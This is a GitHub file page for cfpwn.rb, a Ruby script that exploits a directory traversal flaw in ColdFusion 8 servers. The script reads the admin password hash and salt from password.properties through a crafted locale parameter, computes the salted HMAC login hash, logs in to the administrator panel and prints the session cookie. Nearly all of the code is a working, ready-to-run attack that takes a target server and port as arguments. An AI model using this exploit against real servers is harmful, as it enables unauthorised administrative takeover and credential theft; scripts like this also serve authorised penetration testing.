forked from averagesecurityguy/scripts
-
Notifications
You must be signed in to change notification settings - Fork 1
/
cfpwn.rb
executable file
·88 lines (74 loc) · 3.08 KB
/
cfpwn.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
#!/usr/bin/env ruby
# Copyright (c) 2012, AverageSecurityGuy
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of AverageSecurityGuy nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
# OF SUCH DAMAGE.
require 'net/http'
require 'net/https'
require 'openssl'
def usage
puts "cfpwn.rb exploits a directory traversal flaw in ColdFusion servers"
puts "to get the admin password hash and salt. The script then logs in "
puts "to the server and gets the authentication cookie."
puts
puts "Usage: cfpwn.rb server port"
end
if not ARGV.length == 2
usage
exit(1)
end
server = ARGV[0]
port = ARGV[1].to_i
# Configure the HTTP object
http = Net::HTTP.new(server, port)
if port == 443 then http.use_ssl = true end
# These may have to be changed based on the details of the vulnerability
path = '/CFIDE/administrator/enter.cfm'
locale = 'locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en'
# Use the directory traversal to get the password from the password.properties file
headers = {
'Host' => server,
'Content-Type' => 'application/x-www-form-urlencoded',
'Content-Length' => locale.length.to_s,
}
resp, data = http.post(path, locale, headers)
# Extract the password
data =~ /\<title\>.*password=([A-F0-9]+).*\<\/title\>/m
password = $1
# Extract the salt
data =~ /\<input name="salt" type="hidden" value="(\d+)"\>/
salt = $1
# Generate hmac_sha1 hash
hash = OpenSSL::HMAC.hexdigest('sha1',salt, password)
# Generate login request with salted hash
logindata = "cfadminPassword=#{hash.upcase}&requestedURL=%2FCFIDE%2Fadministrator%2Fenter.cfm%3F"
logindata += "&salt=#{salt}&submit=Login"
loginheaders = {
'Host' => server,
}
# Print out the authenticaiton cookie
resp, data = http.post(path, logindata, loginheaders)
puts resp['set-cookie']